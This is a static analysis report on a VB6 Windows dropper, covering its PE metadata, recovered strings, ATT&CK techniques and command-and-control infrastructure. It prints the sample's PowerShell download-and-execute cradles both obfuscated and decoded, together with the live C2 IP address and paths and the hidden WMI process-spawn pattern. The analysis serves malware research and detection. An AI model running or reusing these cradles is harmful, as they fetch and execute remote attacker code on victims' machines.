4544f0e53697d770eac70abad5790433d5e0b70282758c0b3383bf04a4f7f9ba4544f0e5 — 54e64e (Morph 8: VB6 PowerShell Cradle + WMI Hidden-Process Dropper)
Status: Static-only. CAPE skipped — no Windows guest available.
1. Build / RE
Language / Compiler: Visual Basic 6 (VB6), compiled to native x86 via MSVBVM60.DLL runtime. ^[file.txt] ^[rabin2-info.txt:17] (lang: vb) ^[strings.txt:3] (MSVBVM60.DLL) ^[strings.txt:12] (C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB). The .text entrypoint is a standard VB5/6 ThunRTMain thunk pushing the VB project descriptor at 0x4010ec before calling the runtime. ^[r2:entry0]
Architecture: PE32, Intel 80386, GUI subsystem, 3 sections (.text, .data, .rsrc). ^[file.txt] ^[pefile.txt:37] (Machine: 0x14C).
Linker: Linker version 6.0 (Major=6, Minor=0). ^[pefile.txt:48] PE timestamp claims 2026-05-28 17:46:51 UTC (0x6A187F8B). ^[pefile.txt:37]
Packing / Obfuscation: None. Not packed, not stripped. The binary is 28 672 bytes but Byte 0x00 makes up 82.4672% of the file's contents ^[pefile.txt:3] — the .data section carries VirtualSize=0xA38 yet SizeOfRawData=0x0, meaning the on-disk image is padded with nulls that expand to zero-initialized data at runtime. ^[pefile.txt:103] No encryption, no custom packer.
Anti-Analysis: Minimal. No debug checks, no VM detection, no anti-disassembly tricks. The .text entropy is only 2.40 ^[pefile.txt:96] — consistent with VB6 p-code or lightly compiled native code with large runtime stubs.
Imports: Trivial import table — only MSVBVM60.DLL via bound imports (bound timestamp 2016-03-25). ^[pefile.txt:246] No direct CreateProcess, ShellExecute, or WinExec imports; execution is delegated to the VB6 runtime (ThunRTMain).
Version Info / Masquerade: VS_VERSIONINFO block present in .rsrc. ^[pefile.txt:195] Forged metadata uses absurd, likely LLM-scraped or prompt-generated strings:
CompanyName: "To give an accurate answer" ^[exiftool.json:36]LegalCopyright/LegalTrademarks: "still popular for GPUs" ^[exiftool.json:37]InternalName: "WMI" ^[exiftool.json:42]OriginalFilename: "WMI.exe" ^[exiftool.json:42]ProductName: "Project1" ^[exiftool.json:39]
These are not plausible human-authored version strings; they read like truncated forum answers or ChatGPT output fragments reused by an automated builder. See version-info-masquerade.
Embedded Strings (radare2 recovered): The standard strings tool missed the payload strings; radare2's /azs scan recovered them from .rsrc/.data:
powershell iex(('ssissrsssm 91.92.240.125:8888/2j | isssesssx').replace('s',''))
powershell iex(('ssissrsssm 91.92.240.125:8888/w5 | isssesssx').replace('s',''))
^[r2:strings]
After stripping 's' characters, both decode to:
powershell iex('irm 91.92.240.125:8888/2j | iex')powershell iex('irm 91.92.240.125:8888/w5 | iex')
Two C2 paths (/2j and /w5) suggest either a primary/failover payload scheme or builder-parameterized URI generation.
WMI Process Spawn Strings (radare2 recovered):
Win32_ProcessStartupSpawnInstance_Win32_Processmgmts:\\.\root\cimv2ShowWindowCreate^[r2:strings]
These correspond to the WMI Win32_Process.Create hidden-window pattern (T1564.003). The VB6 binary likely instantiates the WMI COM objects at runtime via CreateObject (VB6 internal) and spawns PowerShell invisibly.
2. Deploy / ATT&CK
All TTPs below are inferred from static strings and PE metadata; no dynamic execution was performed (CAPE skipped — no Windows guest).
| Technique | ATT&CK ID | Evidence |
|---|---|---|
| Command and Scripting Interpreter: PowerShell | T1059.001 | Two embedded powershell iex(...) cradles with irm download-and-execute. ^[r2:strings] |
| Ingress Tool Transfer | T1105 | irm 91.92.240.125:8888/2j and /w5 — HTTP payload retrieval via Invoke-RestMethod. ^[r2:strings] |
| Hide Artifacts: Hidden Window | T1564.003 | WMI Win32_ProcessStartup.ShowWindow = 0 + Win32_Process.Create to spawn PowerShell hidden. ^[r2:strings] |
| Masquerading: Match Legitimate Name or Location | T1036.005 | OriginalFilename: WMI.exe, InternalName: WMI — masquerades as a Windows Management Instrumentation utility. ^[exiftool.json:42] |
| Masquerading | T1036 | Absurd LLM-scraped version strings ("To give an accurate answer", "still popular for GPUs"). ^[exiftool.json:36-37] |
| User Execution: Malicious File | T1204.002 | PE32 GUI executable, user-launched. ^[file.txt] |
C2 / Infrastructure:
- IP:
91.92.240.125:8888 - Paths:
/2j,/w5 - Protocol: HTTP (inferred from
irmwithout-UseBasicParsingor TLS flags in the stripped string). No domain, no hardcoded URI beyond the IP.
Attribution / Builder Clues:
- The
Project1default project name andModule1/MDIForm1identifiers are unmodified VB6 IDE defaults, indicating a low-effort builder or a novice operator. ^[strings.txt:4-8] - The version-string word salad ("To give an accurate answer", "still popular for GPUs") strongly suggests an automated builder that samples text from LLM outputs, StackOverflow, or Reddit threads to populate VS_VERSIONINFO fields. This is a distinct builder artefact not observed in the seven prior 54e64e morphs.
- No code overlap with prior 54e64e morphs (MSVC, Go, .NET, IExpress/AutoIt3). The only commonality is the OpenCTI umbrella label and the
dropped-by-amadeyco-tag.
Summary
This sample is the eighth confirmed build morph under the contested 54e64e OpenCTI label. It is a minimal VB6-native PE that embeds two PowerShell download cradles (with trivial replace('s','') obfuscation) and delegates hidden execution to WMI via the VB6 runtime's COM object instantiation. No custom packer, no anti-analysis, and absurd LLM-scraped version metadata. Static-only analysis; dynamic confirmation of the WMI → PowerShell chain would require a Windows sandbox.